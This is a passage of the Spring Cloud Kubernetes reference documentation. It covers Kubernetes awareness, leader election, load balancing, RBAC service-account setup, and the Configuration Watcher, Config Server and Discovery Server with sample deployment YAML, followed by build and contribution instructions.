the:\n`spring.main.cloud-platform=KUBERNETES`. This will make `spring-cloud-kubernetes` act as-if it is deployed in a real cluster.\nBe aware that when `spring-cloud-kubernetes-config` is on the classpath, `spring.main.cloud-platform` should be set in `bootstrap.{properties|yml}`\n(or the profile specific one), otherwise it should be in `application.{properties|yml}` (or the profile specific one).\nAlso note that these properties: `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled`\nonly take effect when set in `bootstrap.{properties|yml}`.\n\n=== Breaking Changes In 3.0.x\n\nIn versions of Spring Cloud Kubernetes prior to `3.0.x`, Kubernetes awareness was implemented using `spring.cloud.kubernetes.enabled` property. This\nproperty was removed and is un-supported. Instead, we use Spring Boot API: https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nIf it is needed to explicitly enable or disable this awareness, use `spring.main.cloud-platform=NONE\/KUBERNETES`.\n\n=== Kubernetes Profile Autoconfiguration\n\nWhen the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.\nThis lets you customize the configuration, to define beans that are applied when the Spring Boot application is deployed\nwithin the Kubernetes platform (for example, different development and production configuration).\n\n=== Istio Awareness\n\nWhen you include the `spring-cloud-kubernetes-fabric8-istio` module in the application classpath, a new profile is added to the application,\nprovided the application is running inside a Kubernetes Cluster with https:\/\/istio.io[Istio] installed. You can then use\nspring `@Profile(\"istio\")` annotations in your Beans and `@Configuration` classes.\n\nThe Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,\nmaking it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.\n\n== Pod Health Indicator\n\nSpring Boot uses https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-project\/spring-boot-actuator\/src\/main\/java\/org\/springframework\/boot\/actuate\/health\/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.\nThat makes it really useful for exposing health-related information to the user and makes it a good fit for use as https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[readiness probes].\n\nThe Kubernetes health indicator (which is part of the core module) exposes the following info:\n\n* Pod name, IP address, namespace, service account, node name, and its IP address\n* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes\n\nYou can disable this `HealthContributor` by setting `management.health.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Info Contributor\n\nSpring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to\nSpring Boot's `\/info` Acturator endpoint.\n\nYou can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Leader Election\nThe Spring Cloud Kubernetes leader election mechanism implements the leader election API of Spring Integration using a Kubernetes ConfigMap.\n\nMultiple application instances compete for leadership, but leadership will only be granted to one.\nWhen granted leadership, a leader application receives an `OnGrantedEvent` application event with leadership `Context`.\nApplications periodically attempt to gain leadership, with leadership granted to the first caller.\nA leader will remain a leader until either it is removed from the cluster, or it yields its leadership.\nWhen leadership removal occurs, the previous leader receives `OnRevokedEvent` application event.\nAfter removal, any instances in the cluster may become the new leader, including the old leader.\n\nTo include it in your project, add the following dependency.\n====\nFabric8 Leader Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-kubernetes-fabric8-leader<\/artifactId>\n<\/dependency>\n----\n====\n\nTo specify the name of the configmap used for leader election use the following property.\n====\n[source,properties]\n----\nspring.cloud.kubernetes.leader.config-map-name=leader\n----\n====\n\n== LoadBalancer for Kubernetes\nThis project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides implementation of load balancer based on Kubernetes Service.\nTo include it to your project add the following dependency.\n====\nFabric8 Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable load balancing based on Kubernetes Service name use the following property. Then load balancer would try to call application using address, for example `service-a.default.svc.cluster.local`\n====\n[source]\n----\nspring.cloud.kubernetes.loadbalancer.mode=SERVICE\n----\n====\n\nTo enabled load balancing across all namespaces use the following property. Property from `spring-cloud-kubernetes-discovery` module is respected.\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf a service needs to be accessed over HTTPS you need to add a label or annotation to your service definition with the name `secured` and the value `true` and the load balancer will then use HTTPS to make requests to the service.\n\n== Security Configurations Inside Kubernetes\n\n\n=== Namespace\n\nMost of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.\nFor earlier versions, it needs to be specified as an environment variable to the pod. A quick way to do this is as follows:\n\n====\n[source]\n----\n env:\n - name: \"KUBERNETES_NAMESPACE\"\n valueFrom:\n fieldRef:\n fieldPath: \"metadata.namespace\"\n----\n====\n\n=== Service Account\n\nFor distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.\nFor any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.\n\nDepending on the requirements, you'll need `get`, `list` and `watch` permission on the following resources:\n\n.Kubernetes Resource Permissions\n|===\n|Dependency | Resources\n\n\n|spring-cloud-starter-kubernetes-fabric8\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-fabric8-config\n|configmaps, secrets\n\n|spring-cloud-starter-kubernetes-client\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-client-config\n|configmaps, secrets\n|===\n\nFor development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system you'll likely want to provide more granular permissions.\n\nThe following Role and RoleBinding are an example for namespaced permissions for the `default` account:\n\n====\n[source,yaml]\n----\nkind: Role\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n namespace: YOUR-NAME-SPACE\n name: namespace-reader\nrules:\n - apiGroups: [\"\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n\n---\n\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n name: namespace-reader-binding\n namespace: YOUR-NAME-SPACE\nsubjects:\n- kind: ServiceAccount\n name: default\n apiGroup: \"\"\nroleRef:\n kind: Role\n name: namespace-reader\n apiGroup: \"\"\n----\n====\n\n== Service Registry Implementation\n\nIn Kubernetes service registration is controlled by the platform, the application itself does not control\nregistration as it may do in other platforms. For this reason using `spring.cloud.service-registry.auto-registration.enabled`\nor setting `@EnableDiscoveryClient(autoRegister=false)` will have no effect in Spring Cloud Kubernetes.\n\n[#spring-cloud-kubernetes-configuration-watcher]\n## Spring Cloud Kubernetes Configuration Watcher\n\nKubernetes provides the ability to https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]\nin the container of your application. When the contents of the ConfigMap or Secret changes, the https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].\n\nHowever, Spring Boot will not automatically update those changes unless you restart the application. Spring Cloud\nprovides the ability refresh the application context without restarting the application by either hitting the\nactuator endpoint `\/refresh` or via publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.\n\nTo achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud\nKubernetes Configuration Watcher controller into your Kubernetes cluster.\n\nThe application is published as a container and is available on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configuration-watcher[Docker Hub].\n\nSpring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways.\n\n1. Over HTTP in which case the application being notified must of the `\/refresh` actuator endpoint exposed and accessible from within the cluster\n2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your custer for the application to use.\n\n### Deployment YAML\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configuration-watcher\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configuration-watcher-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configuration-watcher\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n spec:\n serviceAccount: spring-cloud-kubernetes-configuration-watcher\n containers:\n - name: spring-cloud-kubernetes-configuration-watcher\n image: springcloud\/spring-cloud-kubernetes-configuration-watcher:2.0.1-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\nThe Service Account and associated Role Binding is important for Spring Cloud Kubernetes Configuration to work properly.\nThe controller needs access to read data about ConfigMaps, Pods, Services, Endpoints and Secrets in the Kubernetes cluster.\n\n### Monitoring ConfigMaps and Secrets\n\nSpring Cloud Kubernetes Configuration Watcher will react to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value `true`\nor any Secret with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels\nor the values of those labels is not `true` then any changes will be ignored.\n\nThe labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting\n`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel` respectively.\n\nIf a change is made to a ConfigMap or Secret with valid labels then Spring Cloud Kubernetes Configuration Watcher will take the name of the ConfigMap or Secret\nand send a notification to the application with that name.\n\n### HTTP Implementation\n\nThe HTTP implementation is what is used by default. When this implementation is used Spring Cloud Kubernetes Configuration Watcher and a\nchange to a ConfigMap or Secret occurs then the HTTP implementation will use the Spring Cloud Kubernetes Discovery Client to fetch all\ninstances of the application which match the name of the ConfigMap or Secret and send an HTTP POST request to the application's actuator\n`\/refresh` endpoint. By default it will send the post request to `\/actuator\/refresh` using the port registered in the discovery client.\n\n#### Non-Default Management Port and Actuator Path\n\nIf the application is using a non-default actuator path and\/or using a different port for the management endpoints, the Kubernetes service for the application\ncan add an annotation called `boot.spring.io\/actuator` and set its value to the path and port used by the application. For example\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Service\nmetadata:\n labels:\n app: config-map-demo\n name: config-map-demo\n annotations:\n boot.spring.io\/actuator: http:\/\/:9090\/myactuator\/home\nspec:\n ports:\n - name: http\n port: 8080\n targetPort: 8080\n selector:\n app: config-map-demo\n----\n====\n\n\nAnother way you can choose to configure the actuator path and\/or management port is by setting\n`spring.cloud.kubernetes.configuration.watcher.actuatorPath` and `spring.cloud.kubernetes.configuration.watcher.actuatorPort`.\n\n### Messaging Implementation\n\nThe messaging implementation can be enabled by setting profile to either `bus-amqp` (RabbitMQ) or `bus-kafka` (Kafka) when the Spring Cloud Kubernetes Configuration Watcher\napplication is deployed to Kubernetes.\n\n### Configuring RabbitMQ\n\nWhen the `bus-amqp` profile is enabled you will need to configure Spring RabbitMQ to point it to the location of the RabbitMQ\ninstance you would like to use as well as any credentials necessary to authenticate. This can be done\nby setting the standard Spring RabbitMQ properties, for example\n\n====\n[source,yaml]\n----\nspring:\n rabbitmq:\n username: user\n password: password\n host: rabbitmq\n----\n====\n\n### Configuring Kafka\n\nWhen the `bus-kafka` profile is enabled you will need to configure Spring Kafka to point it to the location of the Kafka Broker\ninstance you would like to use. This can be done by setting the standard Spring Kafka properties, for example\n\n====\n[source,yaml]\n----\nspring:\n kafka:\n producer:\n bootstrap-servers: localhost:9092\n----\n====\n\n[#spring-cloud-kubernetes-configserver]\n## Spring Cloud Kubernetes Config Server\n\nThe Spring Cloud Kubernetes Config Server, is based on https:\/\/spring.io\/projects\/spring-cloud-config[Spring Cloud Config Server] and adds an https:\/\/docs.spring.io\/spring-cloud-config\/docs\/current\/reference\/html\/#_environment_repository[environment repository] for Kubernetes\nhttps:\/\/kubernetes.io\/docs\/concepts\/configuration\/configmap\/[Config Maps] and https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets].\n\nThis is component is completely optional. However, it allows you to continue to leverage configuration\nyou may have stored in existing environment repositories (Git, SVN, Vault, etc) with applications that you are running on Kubernetes.\n\nA default image is located on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configserver[Docker Hub] which will allow you to easily get a Config Server deployed on Kubernetes without building\nthe code and image yourself. However, if you need to customize the config server behavior you can easily build your own\nimage from the source code on GitHub and use that.\n\n### Configuration\n\n#### Enabling The Kubernetes Environment Repository\nTo enable the Kubernetes environment repository the `kubernetes` profile must be included in the list of active profiles.\nYou may activate other profiles as well to use other environment repository implementations.\n\n#### Config Map and Secret PropertySources\nBy default, only Config Map data will be fetched. To enable Secrets as well you will need to set `spring.cloud.kubernetes.secrets.enableApi=true`.\nYou can disable the Config Map `PropertySource` by setting `spring.cloud.kubernetes.config.enableApi=false`.\n\n#### Fetching Config Map and Secret Data From Additional Namespaces\nBy default, the Kubernetes environment repository will only fetch Config Map and Secrets from the namespace in which it is deployed.\nIf you want to include data from other namespaces you can set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces` to a comma separated\nlist of namespace values.\n\nNOTE: If you set `spring.cloud.kubernetes.configserver.config-map-namespaces` and\/or `spring.cloud.kubernetes.configserver.secrets-namespaces`\nyou will need to include the namespace in which the Config Server is deployed in order to continue to fetch Config Map and Secret data from that namespace.\n\n#### Kubernetes Access Controls\nThe Kubernetes Config Server uses the Kubernetes API server to fetch Config Map and Secret data. In order for it to do that\nit needs ability to `get` and `list` Config Map and Secrets (depending on what you enable\/disable).\n\n### Deployment Yaml\n\nBelow is a sample deployment, service and permissions configuration you can use to deploy a basic Config Server to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n name: spring-cloud-kubernetes-configserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"secrets\"]\n verbs: [\"get\", \"list\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configserver-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configserver\n spec:\n serviceAccount: spring-cloud-kubernetes-configserver\n containers:\n - name: spring-cloud-kubernetes-configserver\n image: springcloud\/spring-cloud-kubernetes-configserver\n imagePullPolicy: IfNotPresent\n env:\n - name: SPRING_PROFILES_INCLUDE\n value: \"kubernetes\"\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\n[#spring-cloud-kubernetes-discoveryserver]\n## Spring Cloud Kubernetes Discovery Server\n\nThe Spring Cloud Kubernetes Discovery Server provides HTTP endpoints apps can use to gather information\nabout services available within a Kubernetes cluster. The Spring Cloud Kubernetes Discovery Server\ncan be used by apps using the `spring-cloud-starter-kubernetes-discoveryclient` to provide data to\nthe `DiscoveryClient` implementation provided by that starter.\n\n### Permissions\nThe Spring Cloud Discovery server uses\nthe Kubernetes API server to get data about Service and Endpoint resrouces so it needs list, watch, and\nget permissions to use those endpoints. See the below sample Kubernetes deployment YAML for an\nexamlpe of how to configure the Service Account on Kubernetes.\n\n\n### Endpoints\nThere are three endpoints exposed by the server.\n\n#### `\/apps`\n\nA `GET` request sent to `\/apps` will return a JSON array of available services. Each item contains\nthe name of the Kubernetes service and service instance information. Below is a sample response.\n\n====\n[source,json]\n----\n[\n {\n \"name\":\"spring-cloud-kubernetes-discoveryserver\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"836a2f25-daee-4af2-a1be-aab9ce2b938f\",\n \"serviceId\":\"spring-cloud-kubernetes-discoveryserver\",\n \"host\":\"10.244.1.6\",\n \"port\":8761,\n \"uri\":\"http:\/\/10.244.1.6:8761\",\n \"secure\":false,\n \"metadata\":{\n \"app\":\"spring-cloud-kubernetes-discoveryserver\",\n \"kubectl.kubernetes.io\/last-applied-configuration\":\"{\\\"apiVersion\\\":\\\"v1\\\",\\\"kind\\\":\\\"Service\\\",\\\"metadata\\\":{\\\"annotations\\\":{},\\\"labels\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"name\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\",\\\"namespace\\\":\\\"default\\\"},\\\"spec\\\":{\\\"ports\\\":[{\\\"name\\\":\\\"http\\\",\\\"port\\\":80,\\\"targetPort\\\":8761}],\\\"selector\\\":{\\\"app\\\":\\\"spring-cloud-kubernetes-discoveryserver\\\"},\\\"type\\\":\\\"ClusterIP\\\"}}\\n\",\n \"http\":\"8761\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n },\n {\n \"name\":\"kubernetes\",\n \"serviceInstances\":[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n ]\n }\n]\n----\n====\n\n#### `\/app\/{name}`\n\nA `GET` request to `\/app\/{name}` can be used to get instance data for all instances of a given\nservice. Below is a sample response when a `GET` request is made to `\/app\/kubernetes`.\n\n====\n[source,json]\n----\n[\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n]\n----\n====\n\n#### `\/app\/{name}\/{instanceid}`\n\nA `GET` request made to `\/app\/{name}\/{instanceid}` will return the instance data for a specific\ninstance of a given service. Below is a sample response when a `GET` request is made to `\/app\/kubernetes\/1234`.\n\n====\n[source,json]\n----\n {\n \"instanceId\":\"1234\",\n \"serviceId\":\"kubernetes\",\n \"host\":\"172.18.0.3\",\n \"port\":6443,\n \"uri\":\"http:\/\/172.18.0.3:6443\",\n \"secure\":false,\n \"metadata\":{\n \"provider\":\"kubernetes\",\n \"component\":\"apiserver\",\n \"https\":\"6443\"\n },\n \"namespace\":\"default\",\n \"scheme\":\"http\"\n }\n----\n====\n\n### Deployment YAML\n\nAn image of the Spring Cloud Discovery Server is hosted on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-discoveryserver[Docker Hub].\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n spec:\n ports:\n - name: http\n port: 80\n targetPort: 8761\n selector:\n app: spring-cloud-kubernetes-discoveryserver\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n name: spring-cloud-kubernetes-discoveryserver:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-discoveryserver\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"services\", \"endpoints\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-discoveryserver-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-discoveryserver\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-discoveryserver\n spec:\n serviceAccount: spring-cloud-kubernetes-discoveryserver\n containers:\n - name: spring-cloud-kubernetes-discoveryserver\n image: springcloud\/spring-cloud-kubernetes-discoveryserver:3.0.0-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8761\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8761\n\n\n----\n====\n\n== Examples\n\nSpring Cloud Kubernetes tries to make it transparent for your applications to consume Kubernetes Native Services by\nfollowing the Spring Cloud interfaces.\n\nIn your applications, you need to add the `spring-cloud-kubernetes-discovery` dependency to your classpath and remove any other dependency that contains a `DiscoveryClient` implementation (that is, a Eureka discovery client).\nThe same applies for `PropertySourceLocator`, where you need to add to the classpath the `spring-cloud-kubernetes-config` and remove any other dependency that contains a `PropertySourceLocator` implementation (that is, a configuration server client).\n\nThe following projects highlight the usage of these dependencies and demonstrate how you can use these libraries from any Spring Boot application:\n\n* https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/master\/spring-cloud-kubernetes-examples[Spring Cloud Kubernetes Examples]: the ones located inside this repository.\n* Spring Cloud Kubernetes Full Example: Minions and Boss\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-minion[Minion]\n\t** https:\/\/github.com\/salaboy\/spring-cloud-k8s-boss[Boss]\n* Spring Cloud Kubernetes Full Example: https:\/\/github.com\/salaboy\/s1p_docs[SpringOne Platform Tickets Service]\n* https:\/\/github.com\/salaboy\/s1p_gateway[Spring Cloud Gateway with Spring Cloud Kubernetes Discovery and Config]\n* https:\/\/github.com\/salaboy\/showcase-admin-tool[Spring Boot Admin with Spring Cloud Kubernetes Discovery and Config]\n\n== Other Resources\n\nThis section lists other resources, such as presentations (slides) and videos about Spring Cloud Kubernetes.\n\n* https:\/\/salaboy.com\/2018\/09\/27\/the-s1p-experience\/[S1P Spring Cloud on PKS]\n* https:\/\/salaboy.com\/2018\/07\/18\/ljc-july-18-spring-cloud-docker-k8s\/[Spring Cloud, Docker, Kubernetes -> London Java Community July 2018]\n\n\nPlease feel free to submit other resources through pull requests to https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes[this repository].\n\n== Configuration properties\n\nTo see the list of all Kubernetes related configuration properties please check link:appendix.html[the Appendix page].\n\n== Building\n\n:jdkversion: 1.8\n\n=== Basic Compile and Test\n\nTo build the source you will need to install JDK {jdkversion}.\n\nSpring Cloud uses Maven for most build-related activities, and you\nshould be able to get off the ground quite quickly by cloning the\nproject you are interested in and typing\n\n----\n$ .\/mvnw install\n----\n\nNOTE: You can also install Maven (>=3.3.3) yourself and run the `mvn` command\nin place of `.\/mvnw` in the examples below. If you do that you also\nmight need to add `-P spring` if your local Maven settings do not\ncontain repository declarations for spring pre-release artifacts.\n\nNOTE: Be aware that you might need to increase the amount of memory\navailable to Maven by setting a `MAVEN_OPTS` environment variable with\na value like `-Xmx512m -XX:MaxPermSize=128m`. We try to cover this in\nthe `.mvn` configuration, so if you find you have to do it to make a\nbuild succeed, please raise a ticket to get the settings added to\nsource control.\n\nThe projects that require middleware (i.e. Redis) for testing generally\nrequire that a local instance of [Docker](https:\/\/www.docker.com\/get-started) is installed and running.\n\n\n=== Documentation\n\nThe spring-cloud-build module has a \"docs\" profile, and if you switch\nthat on it will try to build asciidoc sources from\n`src\/main\/asciidoc`. As part of that process it will look for a\n`README.adoc` and process it by loading all the includes, but not\nparsing or rendering it, just copying it to `${main.basedir}`\n(defaults to `${basedir}`, i.e. the root of the project). If there are\nany changes in the README it will then show up after a Maven build as\na modified file in the correct place. Just commit it and push the change.\n\n=== Working with the code\nIf you don't have an IDE preference we would recommend that you use\nhttps:\/\/www.springsource.com\/developer\/sts[Spring Tools Suite] or\nhttps:\/\/eclipse.org[Eclipse] when working with the code. We use the\nhttps:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin for maven support. Other IDEs and tools\nshould also work without issue as long as they use Maven 3.3.3 or better.\n\n==== Activate the Spring Maven profile\nSpring Cloud projects require the 'spring' Maven profile to be activated to resolve\nthe spring milestone and snapshot repositories. Use your preferred IDE to set this\nprofile to be active, or you may experience build errors.\n\n==== Importing into eclipse with m2eclipse\nWe recommend the https:\/\/eclipse.org\/m2e\/[m2eclipse] eclipse plugin when working with\neclipse. If you don't already have m2eclipse installed it is available from the \"eclipse\nmarketplace\".\n\nNOTE: Older versions of m2e do not support Maven 3.3, so once the\nprojects are imported into Eclipse you will also need to tell\nm2eclipse to use the right profile for the projects. If you\nsee many different errors related to the POMs in the projects, check\nthat you have an up to date installation. If you can't upgrade m2e,\nadd the \"spring\" profile to your `settings.xml`. Alternatively you can\ncopy the repository settings from the \"spring\" profile of the parent\npom into your `settings.xml`.\n\n==== Importing into eclipse without m2eclipse\nIf you prefer not to use m2eclipse you can generate eclipse project metadata using the\nfollowing command:\n\n[indent=0]\n----\n\t$ .\/mvnw eclipse:eclipse\n----\n\nThe generated eclipse projects can be imported by selecting `import existing projects`\nfrom the `file` menu.\n\n\n== Contributing\n\n:spring-cloud-build-branch: master\n\nSpring Cloud is released under the non-restrictive Apache 2.0 license,\nand follows a very standard Github development process, using Github\ntracker for issues and merging pull requests into master. If you want\nto contribute even something trivial please do not hesitate, but\nfollow the guidelines below.\n\n=== Sign the Contributor License Agreement\nBefore we accept a non-trivial patch or pull request we will need you to sign the\nhttps:\/\/cla.pivotal.io\/sign\/spring[Contributor License Agreement].\nSigning the contributor's agreement does not grant anyone commit rights to the main\nrepository, but it does mean that we can accept your contributions, and you will get an\nauthor credit if we do. Active contributors might be asked to join the core team, and\ngiven the ability to merge pull requests.\n\n=== Code of Conduct\nThis project adheres to the Contributor Covenant https:\/\/github.com\/spring-cloud\/spring-cloud-build\/blob\/master\/docs\/src\/main\/asciidoc\/code-of-conduct.adoc[code of\nconduct]. By participating, you are expected to uphold this code. Please report\nunacceptable behavior to spring-code-of-conduct@pivotal.io.\n\n=== Code Conventions and Housekeeping\nNone of these is essential for a pull request, but they will all help. They can also be\nadded after the original pull request but before a merge.\n\n* Use the Spring Framework code format conventions. If you use Eclipse\n you can import formatter settings using the\n `eclipse-code-formatter.xml` file from the\n https:\/\/raw.githubusercontent.com\/spring-cloud\/spring-cloud-build\/master\/spring-cloud-dependencies-parent\/eclipse-code-formatter.xml[Spring\n Cloud Build] project. If using IntelliJ, you can use the\n https:\/\/plugins.jetbrains.com\/plugin\/6546[Eclipse Code Formatter\n Plugin] to import the same file.\n* Make sure all new `.java` files to have a simple Javadoc class comment with at least an\n `@author` tag identifying you, and preferably at least a paragraph on what the class is\n for.\n* Add the ASF license header comment to all new `.java` files (copy from existing files\n in the project)\n* Add yourself as an `@author` to the .java files that you modify substantially (more\n than cosmetic changes).\n* Add some Javadocs and, if you change the namespace, some XSD doc elements.\n* A few unit tests would help a lot as well -- someone has to do 